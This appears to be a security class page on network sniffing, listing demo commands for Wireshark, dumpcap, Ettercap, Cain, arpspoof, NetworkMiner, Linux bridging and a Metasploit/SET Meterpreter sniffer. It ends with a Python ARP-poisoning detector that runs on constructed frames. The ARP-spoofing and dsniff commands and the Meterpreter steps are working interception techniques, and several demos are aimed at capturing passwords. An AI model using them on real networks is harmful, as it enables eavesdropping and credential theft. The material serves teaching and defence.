This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep and Xplico. I lost part of Gary's on-screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.
Part 1: Intro to Sniffers
Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.
Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi
Part 2: Wireshark and Wireless with Gary Hampton
Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.
Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi
Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep, Xplico and bridging.
Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.
Commands used:
Wireshark Demo
1. Run Wireshark
2. Basic start capture
3. Start capture with options
4. Drill down OSI
5. Capture filter options (4.9 in book):
   not tcp port 3389
   not broadcast and not multicast
6. Show a packet
7. Pop a packet out
8. Sort by columns
9. Follow stream (web traffic)
10. Export HTTP Objects
11. Simple view filters:
   tcp.port == 80
   !(ip.addr == 192.168.1.13)
12. Filter builder
13. Apply filters from different panes (packet vs. details panes)
14. Save filters
15. Open a Wiki page
16. Edit -> Find packet
17. Analyzers -> Expert Info
18. Analyzers -> Firewall ACLs
19. Stats
20. Color rules
21. Save capture
22. Mention Lua

Dumpcap/TCPDump
   dumpcap -D
   dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap

Sniffing in Monitor mode
   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up

Ettercap Demo
1. ettercap -T -q -i eth0 -M ARP // //
2. ettercap -T -q -i eth0 -M ARP // /10.1.1.1/
3. Show ARP traffic
4. Telnet to 10.1.1.1
5. http to 10.1.1.1
6. FTP/Telnet/HTTP someplace with a password
7. Show find sniffers:
   ettercap -G
   ettercap -T -i eth0 -P list
   ettercap -T -i eth0 -P search_promisc //
8. Filters:
   etterfilter ig.filter -o ig.ef
   ettercap -T -q -F ig.ef -M ARP // //
9. Mention MITM: icmp, dhcp, port filters
10. driftnet -i eth0
11. Etherape

Cain Demo
1. Start poisoning
2. Telnet to 10.1.1.1
3. http to 10.1.1.1
4. FTP/Telnet/HTTP someplace with a password
5. SSL someplace from VM
6. Sniff RDP

ARPSpoof Demo
   cat /proc/sys/net/ipv4/ip_forward
   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -i eth0 10.0.0.1
   arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
   dsniff -i eth0 -c

NetworkMiner
1. TCP fingerprinting
2. Host details
3. DHCP fingerprinting
4. File capture
5. Passwords
6. Plaintext
7. Open pcap

Bridging in Linux
Setup:
   sudo apt-get install bridge-utils
Script to set up MAC bridging:
   ifconfig eth0 0.0.0.0
   ifconfig eth1 0.0.0.0
   brctl addbr mybridge
   brctl addif mybridge eth0
   brctl addif mybridge eth1
   ifconfig mybridge up
Things to show while bridged:
   ifconfig
   sudo tcpdump -i mybridge -s 0 -w out.cap
   sudo etherape -i mybridge
   sudo driftnet -i mybridge

Metasploit/SET
Backtrack -> Penetration -> SET
Menu choices: 2, 1, 2 (Google.com), 2, 2, default, no
<go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
<Show in Wireshark>
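As an added example that is not part of the class notes above, here is the check a defender would run over the ARP traffic the Ettercap, Cain and arpspoof demos produce: parse raw ARP replies and flag any IP whose claimed MAC changes, which is the condition Wireshark's Expert Info reports as a duplicate IP address. The frames are constructed sample input; the MAC addresses are made up, and the 10.0.0.1 gateway and 10.0.0.113 host follow the ARPSpoof demo.

```python
import struct

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode for a reply

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed Ethernet II + ARP reply frame, used only as sample input."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen, plen, reply
    arp += mac_bytes(sender_mac) + bytes(int(o) for o in sender_ip.split("."))
    arp += mac_bytes(target_mac) + bytes(int(o) for o in target_ip.split("."))
    return eth + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return opcode, sender_mac, sender_ip

def detect_arp_poisoning(frames):
    """Flag each ARP reply whose sender MAC differs from the MAC first seen for that IP."""
    first_seen = {}   # ip -> MAC from the first reply claiming that ip
    alerts = []       # (ip, first_mac, conflicting_mac)
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        baseline = first_seen.setdefault(ip, mac)
        if baseline != mac:
            alerts.append((ip, baseline, mac))
    return alerts

def sample_frames():
    """Constructed capture: two genuine gateway replies, then one claiming 10.0.0.1 from another MAC."""
    gw, victim, other = "02:00:00:00:00:01", "02:00:00:00:00:71", "02:00:00:00:00:99"
    return [
        build_arp_reply(gw, "10.0.0.1", victim, "10.0.0.113"),
        build_arp_reply(gw, "10.0.0.1", victim, "10.0.0.113"),
        build_arp_reply(other, "10.0.0.1", victim, "10.0.0.113"),
    ]

if __name__ == "__main__":
    for ip, old, new in detect_arp_poisoning(sample_frames()):
        print(f"ARP conflict for {ip}: first seen {old}, now claimed by {new}")
```

On a live segment the same logic applies to replies read from a capture such as the out.cap produced in the bridging demo; a gateway IP switching MACs mid-capture is the signature to look for.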